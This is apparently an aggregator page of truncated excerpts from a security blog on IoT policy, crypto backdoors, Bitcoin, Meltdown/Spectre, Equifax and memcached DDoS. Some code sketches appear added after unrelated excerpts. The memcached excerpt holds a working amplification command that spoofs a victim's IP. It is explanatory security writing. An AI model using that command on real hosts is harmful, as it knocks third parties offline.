This takes a while to write to the SD card. You can type [ctrl-T] to see progress if you want.

When we are done writing, don't eject the card. We are going to edit the contents as described below before we stick it into our Raspberry Pi. After running dd, it's going to be automatically mounted on your Mac; on mine it comes up as /Volumes/boot. When I say "root directory of the SD card" in the instructions below, I mean that directory.

Troubleshooting: If you get the "Resource busy" error when running dd, it means you didn't unmount the drive. Go back and run diskutil unmount /dev/disk2s1 (or equivalent for whatever mount tells you the SD card is using).

You can use the "raw" disk instead of the normal disk, such as /dev/rdisk2. I don't know what the tradeoffs are.

Ethernet

The RPi B comes with Ethernet built-in Guideline
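For the WiFi option mentioned above, the standard Raspbian trick is to drop two files into the boot partition before first boot. A minimal sketch, assuming the card is mounted at /Volumes/boot as described, and using placeholder SSID, passphrase, and country code:

# Enable the SSH server on first boot by creating an empty file named "ssh"
touch /Volumes/boot/ssh

# Create wpa_supplicant.conf in the boot partition; on first boot, Raspbian
# copies it into place and joins the network (ssid/psk are placeholders)
cat > /Volumes/boot/wpa_supplicant.conf <<'EOF'
country=US
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
    ssid="YourNetwork"
    psk="YourPassphrase"
}
EOF

After booting, the Pi should then be reachable over WiFi as ssh pi@raspberrypi.local (via mDNS), with no monitor or keyboard ever attached.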
ErrataRob.webp 2018-08-20 16:06:46 DeGrasse Tyson: Make Truth Great Again (lien direct) Neil deGrasse Tyson tweets the following:

I'm okay with a US Space Force. But what we need most is a Truth Force - one that defends against all enemies of accurate information, both foreign & domestic.- Neil deGrasse Tyson (@neiltyson) August 20, 2018

When people make comparisons with Orwell's "Ministry of Truth", he obtusely persists:

A good start: The National Academy of Sciences, which “…provides objective, science-based advice on critical issues affecting the nation."- Neil deGrasse Tyson (@neiltyson) August 20, 2018

Given that Orwellian dystopias were the theme of this summer's DEF CON hacker conference, let's explore what's wrong with this idea.

Truth vs. "Truth"

I work in a corrupted industry, variously known as the "infosec" community or "cybersecurity" industry. It's a great example of how truth is corrupted into "Truth".

At a recent government policy meeting, I pointed out how vendors often downplay the risk of bugs (vulnerabilities that can be exploited by hackers). When vendors are notified of these bugs and release a patch to fix them, they often give a risk rating. These ratings are often too low, in order to protect the corporate reputation. The representative from Oracle claimed that they didn't do that, and that indeed, they'll often overestimate the risk. Other vendors chimed in, also claiming they rated the risk higher than it really was.

In a neutral world, deliberately overestimating the risk would be the same falsehood as deliberately underestimating it. But we live in a non-neutral world, where only one side is a lie, the middle is truth, and the other side is "Truth". Lying in the name of the "Truth" is somehow acceptable.

Moreover, Oracle is famous for having downplayed the risk of significant bugs in the past, and is well-known in the industry as the least trustworthy vendor as far as the security of its products is concerned. Much of its policy efforts in Washington D.C. are focused on preventing its dirty laundry from being exposed. It isn't simply another vendor promoting "Truth", but one deliberately exploiting "Truth" to corrupt ends.

That we should exaggerate the risks of cybersecurity, deliberately lying to people for their own good, is the uncontroversial consensus of our infosec/cybersec community. Most do it; few think this is wrong. Security is a moral imperative that justifies "Truth".

The National Academy of Sciences

So are we getting the truth or "Truth" from organizations like the National Academy of Sciences?

The question here isn't global warming. That mankind's carbon emissions warm the climate is truth. We have a good understanding of how greenhouse gases work, as well as many measures of the climate showing that warming is occurring. The Arctic is steadily losing ice each summer.

Instead, the question is "Global Warming", the claims made by politicians on the subject. Do politicians on the left fairly represent the truth, or are they pushing the "Truth"?

Which side is the National Academy of Sciences on? Are they committed to the truth, or (like the infosec/cybersec community) are they pursuing "Truth"? Is global warming a moral imperative that justifies playing loose with the facts?

Googling "national academy of sciences climate chang Guideline APT 32
ErrataRob.webp 2018-07-12 19:54:20 Your IoT security concerns are stupid (lien direct) Lots of government people are focused on IoT security, such as this recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question.

Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone/laptop computer, which is all "in your face", IoT devices, once installed, are quickly forgotten. For another thing, the average lifespan of a device on your network is at least twice the duration of support from the vendor making patches available.

Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don't get applied cause a small but manageable, constant hacking problem. Automatic patching causes rarer but more catastrophic events when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet, which was launched by subverting an automated patch of accounting software.

Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have unique requirements of being exposed to the Internet and needing a remote factory reset, leading to the worm. While notPetya did exploit a Microsoft vuln, its primary vector of spreading (after the subverted update) was via misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite supporting their vuln/patching policy, neither was really about vulns/patching.

Such technical analysis of events like Mirai and notPetya is ignored. Policymakers are only cherry-picking the superficial conclusions supporting their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them.

IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted. Those off-brand, poorly engineered security cameras you buy for $19 from Amazon.com, shipped directly from Shenzhen, now look very different from the ones used in Mirai, having less Internet exposure. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services.

In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100 billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4 billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home.

Lastly, focusing on the ven Hack Patching Guideline NotPetya
ErrataRob.webp 2018-05-23 14:39:01 C is too low level (lien direct) I'm in danger of contradicting myself, after previously pointing out that x86 machine code is a high-level language, but this article claiming C is not a low-level language is bunk. C certainly has some problems, but it's still the closest language to assembly. This is obvious from the fact that it's still the fastest compiled language. What we see is a typical academic out of touch with the real world.

The author makes the (wrong) observation that we've been stuck emulating the PDP-11 for the past 40 years. C was written for the PDP-11, and since then CPUs have been designed to make C run faster. The author imagines a different world, such as one where CPU designers instead target something like LISP as their preferred language, or Erlang. This misunderstands the state of the market. CPUs do indeed support lots of different abstractions, and C has evolved to accommodate this.

The author criticizes things like "out-of-order" execution, which has led to the Spectre side-channel vulnerabilities. Out-of-order execution is necessary to make C run faster. The author claims instead that those resources should be spent on having more, slower CPUs with more threads. This sacrifices single-threaded performance in exchange for a lot more threads executing in parallel. The author cites Sparc Tx CPUs as his ideal processor.

But here's the thing: the Sparc Tx was a failure. To be fair, it's mostly a failure because most of the time, people wanted to run old C code instead of new Erlang code. But it was still a failure at running Erlang.

Time after time, engineers keep finding that "out-of-order", single-threaded performance is still the winner. A good example is ARM processors for both mobile phones and servers. All the theory points to in-order CPUs as being better, but all the products are out-of-order, because this theory is wrong. The custom ARM cores from Apple and Qualcomm used in most high-end phones are so deeply out-of-order they give Intel CPUs competition. The same is true on the server front with the latest Qualcomm Centriq and Cavium ThunderX2 processors, deeply out-of-order, supporting more than 100 instructions in flight.

The Cavium is especially telling. Its ThunderX CPU had 48 simple cores, which were replaced in the ThunderX2 by 32 complex, deeply out-of-order cores. The performance increase was massive, even on multithread-friendly workloads. Every competitor to Intel's dominance in the server space has learned the lesson of the Sparc Tx: many wimpy cores are a failure; you need fewer, beefier cores. Yes, they don't need to be as beefy as Intel's processors, but they need to be close.

Even Intel's "Xeon Phi" custom chip learned this lesson. This is their GPU-like chip, running 60 cores with 512-bit wide "vector" (sic) instructions, designed for supercomputer applications. Its first version was purely in-order. Its current version is slightly out-of-order. It supports four threads and focuses on basic number crunching, so in-order cores seem to be the right approach, but Intel found even in this case that out-of-order processing still provided a benefit. Practice is different from theory.

As an academic, the author of the above article focuses on abstractions.
The criticism of C is that it has the wrong abstractions, which are hard to optimize, and that if we instead expressed things in the right abstractions, it would be easier to optimize.

This is an intellectually compelling argument, but so far bunk.

The reason is that while the theoretical base language has issues, everyone programs using extensions to the language, like "intrinsics" (C 'functions' that map to assembly instructions). Programmers write libraries using these intrinsics, which then the rest of the normal programmers use. In other words, if your criticism is that C is not itself low level enou Guideline
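To see the "intrinsics map to assembly instructions" point concretely, here is a minimal sketch (my example, not the article's): it compiles a one-line function built on GCC's __builtin_popcountll intrinsic and inspects the generated assembly, assuming an x86-64 machine whose CPU supports the POPCNT extension.

# Write a tiny C function using a compiler intrinsic
cat > popcount.c <<'EOF'
/* Counts the 1-bits in x; with -march=native on a POPCNT-capable CPU,
   the intrinsic compiles down to a single POPCNT instruction. */
unsigned count_bits(unsigned long long x) {
    return __builtin_popcountll(x);
}
EOF

# Compile to assembly and look for the single instruction
gcc -O2 -march=native -S popcount.c -o popcount.s
grep -i popcnt popcount.s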
ErrataRob.webp 2018-04-25 16:46:42 No, Ray Ozzie hasn't solved crypto backdoors (lien direct) According to this Wired article, Ray Ozzie may have a solution to the crypto backdoor problem. No, he hasn't. He's only solving the part we already know how to solve. He's deliberately ignoring the stuff we don't know how to solve. We know how to make backdoors; we just don't know how to secure them.

The vault doesn't scale

Yes, Apple has a vault where they've successfully protected important keys. No, it doesn't mean this vault scales. The more people, and the more often you have to touch the vault, the less secure it becomes. We are talking thousands of requests per day from 100,000 different law enforcement agencies around the world. We are unlikely to protect this against incompetence and mistakes. We are definitely unable to secure this against deliberate attack.

A good analogy to Ozzie's solution is LetsEncrypt for getting SSL certificates for your website, which is fairly scalable, using a private key locked in a vault for signing hundreds of thousands of certificates. That this scales seems to validate Ozzie's proposal.

But at the same time, LetsEncrypt is easily subverted. LetsEncrypt uses DNS to verify your identity. But spoofing DNS is easy, as was shown in the recent BGP attack against a cryptocurrency. Attackers can create fraudulent SSL certificates with enough effort. We've got other protections against this, such as discovering and revoking the bad SSL certificate, so while damaging, it's not catastrophic.

But with Ozzie's scheme, equivalent attacks would be catastrophic, as they would lead to unlocking the phone and stealing all of somebody's secrets.

In particular, consider what would happen if LetsEncrypt's certificate was stolen (as Matthew Green points out). The consequence is that this would be detected and mass revocations would occur. If Ozzie's master key were stolen, nothing would happen. Nobody would know, and evildoers would be able to freely decrypt phones. Ozzie claims his scheme can work because SSL works -- but then his scheme includes none of the many protections necessary to make SSL work.

What I'm trying to show here is that in a lab, it all looks nice and pretty, but when attacked at scale, things break down -- quickly. We have so much experience with failure at scale that we can judge Ozzie's scheme as woefully incomplete. It's not even up to the standard of SSL, and we have a long list of SSL problems.

Cryptography is about people more than math

We have a mathematically pure encryption algorithm called the "One Time Pad". It can't ever be broken, provably so with mathematics.

It's also perfectly useless, as it's not something humans can use. That's why we use AES, which is vastly less secure (anything you encrypt today can probably be decrypted in 100 years). AES can be used by humans whereas One Time Pads cannot be. (I learned the fallacy of One Time Pads on my grandfather's knee -- he was a WW II codebreaker who broke German messages trying to futz with One Time Pads.)

The same is true with Ozzie's scheme. It focuses on the mathematical model but ignores the human element. We already know how to solve the mathematical problem in a hundred different ways. The part we don't know how to secure is the human element.

How do we know the law enforcement person is who they say they are? How do we know the "trusted Apple employee" can't be bribed?
How can the law enforcement agent communicate securely with the Apple employee?

You think these things are theoretical, but they aren't. Consider financial transactions. It used to be common that you could just email your bank/broker to wire funds into an account for such things as buying a house. Hackers have subverted that, intercepting messages, changing account numbers, Guideline
ErrataRob.webp 2018-04-16 07:42:52 My letter urging Georgia governor to veto anti-hacking bill (lien direct) February 16, 2018

Office of the Governor
206 Washington Street
111 State Capitol
Atlanta, Georgia 30334

Re: SB 315

Dear Governor Deal:

I am writing to urge you to veto SB315, the "Unauthorized Computer Access" bill.

The cybersecurity community, of which Georgia is a leader, is nearly unanimous that SB315 will make cybersecurity worse. You've undoubtedly heard from many of us opposing this bill. It does not help in prosecuting foreign hackers who target Georgia's computers, such as our elections systems. Instead, it prevents those who notice security flaws from pointing them out, thereby getting them fixed. This law violates the well-known Kerckhoffs's Principle: security is achieved through transparency and openness, not through secrecy and obscurity.

That the bill contains this flaw is no accident. The justification for this bill comes from an incident where a security researcher noticed a Georgia state election system had made voter information public. This remained unfixed, months after the vulnerability was first disclosed, leaving the data exposed. Those in charge decided that it was better to prosecute those responsible for discovering the flaw rather than punish those who failed to secure Georgia voter information, hence this law.

Too many security experts oppose this bill for it to go forward. Signing this bill, one that is weak on cybersecurity by favoring political cover-up over the consensus of the cybersecurity community, will be part of your legacy. I urge you instead to veto this bill, commanding the legislature to write a better one, this time consulting experts, which, due to Georgia's thriving cybersecurity community, we do not lack.

Thank you for your attention.

Sincerely,
Robert Graham
(formerly) Chief Scientist, Internet Security Systems Guideline
ErrataRob.webp 2018-03-12 05:46:00 What John Oliver gets wrong about Bitcoin (lien direct) John Oliver covered bitcoin/cryptocurrencies last night. I thought I'd describe a bunch of things he gets wrong.

How Bitcoin works

Nowhere in the show does it describe what Bitcoin is and how it works.

Discussions should always start with Satoshi Nakamoto's original paper. The thing Satoshi points out is that there is an important cost to normal transactions, namely, the entire legal system designed to protect you against fraud, such as the way you can reverse the transactions on your credit card if it gets stolen. The point of Bitcoin is that there is no way to reverse a charge. A transaction is done via cryptography: to transfer money to me, you sign the transaction with your secret key, handing ownership over to my key, with no third party involved that can reverse the transaction, and essentially no overhead.

All the rest of the stuff, like the decentralized blockchain and mining, is about making that work.

Bitcoin crazies forget about the original genesis of Bitcoin. For example, they talk about adding features to stop fraud, reversing transactions, and having a central authority that manages that. This misses the point, because the existing electronic banking system already does that, and does a better job at it than cryptocurrencies ever can. If you want to mock cryptocurrencies, talk about the "DAO", which did exactly that -- and collapsed in a big fraudulent scheme where insiders made money and outsiders didn't.

Sticking to Satoshi's original ideas is a lot better than trying to repeat how the crazy fringe activists define Bitcoin.

How does any money have value?

Oliver's answer is that currencies have value because people agree that they have value, like how they agree a Beanie Baby is worth $15,000.

This is wrong. A better way of asking the question is to ask why the value of money changes. The dollar has been losing roughly 2% of its value each year for decades. This is called "inflation": as the dollar loses value, it takes more dollars to buy things, which means the price of things (in dollars) goes up, and employers have to pay us more dollars so that we can buy the same amount of things.

The reason the value of the dollar changes is largely because the Federal Reserve manages the supply of dollars, through the same law of Supply and Demand. As you know, if a supply decreases (like oil), then the price goes up, or if the supply of something increases, the price goes down. The Fed manages money the same way: when prices rise (the dollar is worth less), the Fed reduces the supply of dollars, causing it to be worth more. Conversely, if prices fall (or don't rise fast enough), the Fed increases supply, so that the dollar is worth less.

The reason money follows the law of Supply and Demand is because people use money; they consume it like they do other goods and services, like gasoline, tax preparation, food, dance lessons, and so forth. It's not like a fine art painting, a stamp collection, or a Beanie Baby -- money is a product. It's just that people have a hard time thinking of it as a consumer product since, in their experience, money is what they use to buy consumer products. But it's a symmetric operation: when you buy gasoline with dollars, you are actually selling dollars in exchange for gasoline. That you call Guideline
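The signature handoff described above can be illustrated with ordinary OpenSSL and Bitcoin's secp256k1 curve. This is a toy sketch of the concept only (file names and the transaction text are placeholders; real Bitcoin transactions use their own script and serialization formats, not openssl):

# Generate a keypair on secp256k1, the curve Bitcoin uses
openssl ecparam -genkey -name secp256k1 -noout -out priv.pem
openssl ec -in priv.pem -pubout -out pub.pem

# "Sign over" a toy transaction: the signature proves the holder of
# priv.pem authorized it, with no third party able to reverse it
echo "pay 1 BTC to recipient" > tx.txt
openssl dgst -sha256 -sign priv.pem -out tx.sig tx.txt

# Anyone can verify using only the public key
openssl dgst -sha256 -verify pub.pem -signature tx.sig tx.txt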
ErrataRob.webp 2018-03-08 06:57:20 Some notes on memcached DDoS (lien direct) I thought I'd write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:

masscan 0.0.0.0/0 -pU:11211 --banners | grep memcached

This example scans the entire Internet (/0). Replace 0.0.0.0/0 with your address range (or ranges).

This produces output that looks like this:

Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 89.110.149.218: [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 84.200.45.2: [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on 5.1.66.2: [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on 103.248.253.112: [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on 193.240.236.171: [memcached] uptime=42083736 time=1520485365 version=1.4.13

The "banners" check filters out those with valid memcached responses, so you don't get other stuff that isn't memcached. To filter this output further, use 'cut' to grab just column 6:

... | cut -d ' ' -f 6 | cut -d: -f1

You often get multiple responses to just one query, so you'll want to sort/uniq the list:

... | sort | uniq

My results from an Internet-wide scan

I got 15181 results (or roughly 15,000).

People are using Shodan to find a list of memcached servers. They might be getting a lot of results back that respond to TCP instead of UDP. Only UDP can be used for the attack.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.

masscan -iL amplifiers.txt -pU:11211 --spoof-ip <target-ip> --rate 100000

I point this out to show how there's no magic in exploiting this. Numerous exploit scripts have been released, because it's so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens to local IP address 127.0.0.1 for local administration. By listening only on the local IP address, remote people cannot talk to the server. Guideline
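Putting the steps above together, the full pipeline for building the amplifier list as one command (the same pieces already shown, just assembled; amplifiers.txt is an arbitrary output name):

# Scan for memcached responders, extract the IP column, de-duplicate
masscan 0.0.0.0/0 -pU:11211 --banners \
  | grep memcached \
  | cut -d ' ' -f 6 | cut -d: -f1 \
  | sort | uniq > amplifiers.txt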
ErrataRob.webp 2018-02-02 21:32:16 Blame privacy activists for the Memo?? (lien direct) Former FBI agent Asha Rangappa @AshaRangappa_ has a smart post debunking the Nunes Memo, then takes it all back again with an op-ed in the NYTimes blaming us privacy activists. She presents an obviously false narrative that the FBI and FISA courts are above suspicion.

I know from first-hand experience the FBI is corrupt. In 2007, they threatened me, trying to get me to cancel a talk that revealed security vulnerabilities in a large corporation's product. Such abuses occur because there is no transparency and oversight. FBI agents write down our conversation in their little notebooks instead of recording it, so that they can control the narrative of what happened, presenting their version of the conversation (leaving out the threats). In this day and age of recording devices, this is indefensible.

She writes "I know firsthand that it's difficult to get a FISA warrant". Yes, the process was difficult for her, an underling. The process is different when a leader tries to do the same thing.

I know this first hand, having casually worked as an outsider with intelligence agencies. I saw two processes in place: one for the flunkies, and one for those above the system. The flunkies constantly complained about how there was too much process in place oppressing them, preventing them from getting their jobs done. The leaders understood the system and how to sidestep those processes.

That's not to say the Nunes Memo has merit, but it does point out that privacy advocates have a point in wanting more oversight and transparency in such surveillance of American citizens.

Blaming us privacy advocates isn't the way to go. It's not going to succeed in tarnishing us, but will push us more into Trump's camp, causing us to reiterate that we believe the FBI and FISA are corrupt. Guideline
ErrataRob.webp 2018-01-04 02:29:18 Some notes on Meltdown/Spectre (lien direct) I thought I'd write up some notes.

You don't have to worry if you patch. If you download the latest update from Microsoft, Apple, or Linux, then the problem is fixed for you and you don't have to worry. If you aren't up to date, then there are a lot of other nasties out there you should probably also be worrying about. I mention this because while this bug is big in the news, it's probably not news the average consumer needs to concern themselves with.

This will force a redesign of CPUs and operating systems. While not a big news item for consumers, it's huge in the geek world. We'll need to redesign operating systems and how CPUs are made.

Don't worry about the performance hit. Some, especially avid gamers, are concerned about the claims of "30%" performance reduction when applying the patch. That's only in some rare cases, so you shouldn't worry too much about it. As far as I can tell, 3D games aren't likely to see more than 1% performance degradation. If you imagine your game is suddenly slower after the patch, then something else broke it.

This wasn't foreseeable. A common cliche is that such bugs happen because people don't take security seriously, or that they are taking "shortcuts". That's not the case here. Speculative execution and timing issues with caches are inherent issues with CPU hardware. "Fixing" this would make CPUs run ten times slower. Thus, while we can tweak hardware going forward, the larger change will be in software.

There's no good way to disclose this. The cybersecurity industry has a process for coordinating the release of such bugs, which appears to have broken down. In truth, it didn't. Once Linus announced a security patch that would degrade performance of the Linux kernel, we knew the coming bug was going to be Big. Looking at the Linux patch, tracking backwards to the bug was only a matter of time. Hence, the release of this information was a bit sooner than some wanted. This is to be expected, and is nothing to be upset about.

It helps to have a name. Many are offended by the crassness of naming vulnerabilities and giving them logos. On the other hand, we are going to be talking about these bugs for the next decade. Having a recognizable name, rather than a hard-to-remember number, is useful.

Should I stop buying Intel? Intel has the worst of the bugs here. On the other hand, ARM and AMD alternatives have their own problems. Many want to deploy ARM servers in their data centers, but these are likely to expose bugs you don't see on x86 servers. The software fix, "page table isolation", seems to work, so there might not be anything to worry about. On the other hand, holding up purchases because of "fear" of this bug is a good way to squeeze price reductions out of your vendor. Conversely, later-generation CPUs, "Haswell" and even "Skylake", seem to have the least performance degradation, so it might be time to upgrade older servers to newer processors.

Intel misleads. Intel has a press release that implies they are not impacted any worse than others. This is wrong: the "Meltdown" issue appears to apply only to Intel CPUs. I don't like such marketing crap, so I mention it.
Statements from companies:
Amazon AWS
ARM
AMD
Intel
Anders Fogh's negative result
Guideline
ErrataRob.webp 2017-11-17 17:55:29 How to read newspapers (lien direct) News articles don't contain the information you think. Instead, they are written according to a formula, and that formula is as much about distorting/hiding information as it is about revealing it.

A good example is the following. I claimed hate-crimes aren't increasing. The tweet below tries to disprove me, by citing a news article that claims the opposite:

Ugh turns out you're wrong! I know you let quality data inform your opinions, and hope the FBI is a sufficiently credible source for you https://t.co/SVwaLilF9B- Rune Sørensen (@runesoerensen) November 14, 2017

But the data behind this article tells a very different story than the words.

Every November, the FBI releases its hate-crime statistics for the previous year. They've been doing this every year for a long time. When they do so, various news organizations grab the data and write a quick story around it.

By "story" I mean a story. Raw numbers don't interest people, so the writer instead has to wrap them in a narrative that does interest people. That's what the writer has done in the above story, leading with the fact that hate crimes have increased.

But is this increase meaningful? What do the numbers actually say?

To answer this, I went to the FBI's website, the source of this data, grabbed the numbers for the last 20 years, and graphed them in Excel, producing the following graph:

As you can see, there is no significant rise in hate-crimes. Indeed, the latest numbers are about 20% below the average for the last two decades, despite a tiny increase in the last couple years. Statistically/scientifically, there is no change, but you'll never read that in a news article, because it's boring and readers won't pay attention. You'll only get a "news story" that weaves a narrative that interests the reader.

So back to the original tweet exchange. The person used the news story to disprove my claim, but going to the underlying data, it only supports my claim that hate-crimes are going down, not up -- the small increases of the past couple years are insignificant compared to the larger decreases of the last two decades.

So that's the point of this post: news stories are deceptive. You have to double-check the data they are based upon, and pay less attention to the narrative they weave, and even less attention to the title designed to grab your attention.

Anyway, as a side-note, I'd like to apologize for being human. The snark/sarcasm of the tweet above gives me extra pleasure in proving them wrong :). Guideline
ErrataRob.webp 2017-10-11 15:09:52 "Responsible encryption" fallacies (lien direct) Deputy Attorney General Rod Rosenstein gave a speech recently calling for "Responsible Encryption" (aka. "Crypto Backdoors"). It's full of dangerous ideas that need to be debunked.

The importance of law enforcement

The first third of the speech talks about the importance of law enforcement, as if it's the only thing standing between us and chaos. It cites the 2016 Mirai attacks as an example of the chaos that will only get worse without stricter law enforcement.

But the Mirai case demonstrated the opposite, how law enforcement is not needed. They made no arrests in the case. A year later, they still haven't a clue who did it.

Conversely, we technologists have fixed the major infrastructure issues. Specifically, those affected by the DNS outage have moved to multiple DNS providers, including high-capacity DNS providers like Google and Amazon that can handle such large attacks easily.

In other words, we the people fixed the major Mirai problem, and law enforcement didn't.

Moreover, instead of being a solution to cyber threats, law enforcement has become a threat itself. The DNC didn't have the FBI investigate the attacks from Russia likely because they didn't want the FBI reading all their files, finding wrongdoing by the DNC. It's not that they did anything actually wrong; it's more like that famous quote from Richelieu: "Give me six words written by the most honest of men and I'll find something to hang him by". Give all your internal emails over to the FBI and I'm certain they'll find something to hang you by, if they want.

Or consider the case of Andrew Auernheimer. He found AT&T's website made public the user accounts of the first iPad, so he copied some down and posted them to a news site. AT&T had denied the problem, so making the problem public was the only way to force them to fix it. Such access to the website was legal, because AT&T had made the data public. However, prosecutors disagreed. In order to protect the powerful, they twisted and perverted the law to put Auernheimer in jail.

It's not that law enforcement is bad; it's that it's not the unalloyed good Rosenstein imagines. When law enforcement becomes the thing Rosenstein describes, it means we live in a police state.

Where law enforcement can't go

Rosenstein repeats the frequent claim in the encryption debate:

Our society has never had a system where evidence of criminal wrongdoing was totally impervious to detection

Of course our society has places "impervious to detection", protected by both legal and natural barriers.

An example of a legal barrier is how spouses can't be forced to testify against each other. This barrier is impervious.

A better example, though, is how so much of government, intelligence, the military, and law enforcement itself is impervious. If prosecutors could gather evidence everywhere, then why isn't Rosenstein prosecuting those guilty of CIA torture?

Oh, you say, government is a special exception. If that were the case, then why did Rosenstein dedicate a precious third of his speech discussing the "rule of law" and how it applies to everyone, "protecting people from abuse by the government"?
It obviously doesn't: there's one rule for government and a different rule for the people, and the rule for government means there are lots of places law enforcement can't go to gather evidence.

Likewise, the crypto backdoor Rosenstein is demanding for citizens doesn't apply to the President, Congress, the NSA, the Army, or Rosenstein himself.

Then there are the natural barriers. The police can't read your mind. They can only get the evidence that is there, like partial fingerprints, which are far less reliable than full fingerpri Guideline
ErrataRob.webp 2017-09-16 18:39:05 People can't read (Equifax edition) (lien direct) One of these days I'm going to write a guide for journalists reporting on the cyber. One of the items I'd stress is that they often fail to read the text of what is being said, but instead read some sort of subtext that wasn't explicitly said. This is valid sometimes, as the subtext is what the writer intended all along, even if they didn't explicitly write it. Other times, though, the imagined subtext is not what the writer intended at all.

A good example is the recent Equifax breach. The original statement says:

Equifax Inc. (NYSE: EFX) today announced a cybersecurity incident potentially impacting approximately 143 million U.S. consumers.

The word consumers was widely translated to customers, as in this Bloomberg story:

Equifax Inc. said its systems were struck by a cyberattack that may have affected about 143 million U.S. customers of the credit reporting agency

But these aren't the same thing. Equifax is a credit reporting agency, keeping data on people who are not its own customers. It's an important difference.

Another good example is yesterday's quote "confirming" that the "Apache Struts" vulnerability was to blame:

Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638.

But it doesn't confirm Struts was responsible. Blaming Struts is certainly the subtext of this paragraph, but it's not the text. It mentions that criminals exploited the Struts vulnerability, but doesn't actually connect the dots to the breach we are all talking about.

There are probably reasons for this. While it's easy for forensics to find evidence of Struts exploitation in logfiles, it's much harder to connect this to the breach. While they suspect Struts, they may not actually be able to confirm it. Or, maybe they are trying to cover things up, where they feel failing to patch is a lesser crime than what they really did.

It's at this point journalists should earn their pay. Instead of rewriting what they read on the Internet, they could do legwork and call up Equifax PR and ask.

The purpose of this post isn't to discuss Equifax, but the tendency of people to "read between the lines", to read some subtext that wasn't actually expressed in the text. Sometimes the subtext is legitimately there, such as how Equifax clearly intends people to blame Struts though they don't say it outright. Sometimes the subtext isn't there, such as how Equifax doesn't mean its own customers, only "U.S. consumers". Journalists need to be careful about making assumptions about the subtext.
Update: The Equifax CSO has a degree in music. Some people have criticized this. Most people have defended it, pointing out that almost nobody has an "infosec" degree in our industry, and many of the top people have no degree at all. Among others, @thegrugq has pointed out that infosec degrees are only a few years old -- they weren't around 20 years ago when today's corporate officers were getting their degrees.

Again, we have the text/subtext problem, where people interpret infosec degrees as being the same as computer-science degrees, the latter of which have existed for decades. Some, as in this case, consider them to be wildly different. Others consider them to be nearly the same.
Guideline Equifax
ErrataRob.webp 2017-08-22 22:48:09 ROI is not a cybersecurity concept (lien direct) In the cybersecurity community, much time is spent trying to speak the language of business, in order to communicate our problems to business leaders. One way we do this is trying to adapt the concept of "return on investment" or "ROI" to explain why they need to spend more money. Stop doing this. It's nonsense. ROI is a concept pushed by vendors in order to justify why you should pay money for their snake-oil security products. Don't play the vendor's game.

The correct concept is simply "risk analysis". Here's how it works.

List out all the risks. For each risk, calculate:
- How often it occurs.
- How much damage it does.
- How to mitigate it.
- How effective the mitigation is (reduces chance and/or cost).
- How much the mitigation costs.

If you have a risk of something that'll happen once-per-day on average, costing $1000 each time, then a mitigation costing $500/day that reduces likelihood to once-per-week is a clear win for investment (see the back-of-the-envelope check at the end of this post).

Now, ROI should in theory fit directly into this model. If you are paying $500/day to reduce that risk, I could use ROI to show you hypothetical products that will:
- reduce the remaining risk to once-per-month for an additional $10/day.
- replace that $500/day mitigation with a $400/day mitigation.

But this is never done. Companies don't have a sophisticated enough risk matrix in order to plug in some ROI numbers to reduce cost/risk. Instead, ROI is a calculation done standalone by a vendor pimping product, or by a security engineer building empires within the company.

If you haven't done risk analysis to begin with (and almost none of you have), then ROI calculations are pointless.

But there are further problems. This is risk analysis as done in industries like oil and gas, which have inanimate risk. Almost all their risks are due to accidental failures, like in the Deepwater Horizon incident. In our industry, cybersecurity, risks are animate -- driven by hackers. Our risk models are based on trying to guess what hackers might do.

An example of this problem is when our drug company jacks up the price of an HIV drug: Anonymous hackers will break in and dump all our financial data, and our CFO will go to jail. A lot of our risks now come not from the technical side, but from the whims and fads of the hacker community.

Another example is when some Google researcher finds a vuln in WordPress, and our website gets hacked by that three months from now. We have to forecast not only what hackers can do now, but what they might be able to do in the future.

Finally, there is this problem with cybersecurity that we really can't distinguish between pesky and existential threats. Take ransomware. A lot of large organizations have just gotten accustomed to wiping a few workers' machines every day and restoring from backups. It's a small, pesky problem of little consequence. Then one day a ransomware infection gets domain admin privileges and takes down the entire business for several weeks, as happened after #nPetya. Inevitably our risk models always come down on the high side of estimates, with us claiming that all threats are existential, when in fact, most companies continue to survive major breaches.

These difficulties with risk analysis lead us to punt on the problem altogether, but that's not the right answer. No matter how faulty our risk analysis is, we still have to go through the exercise.

One model of how to do this calculation is architecture.
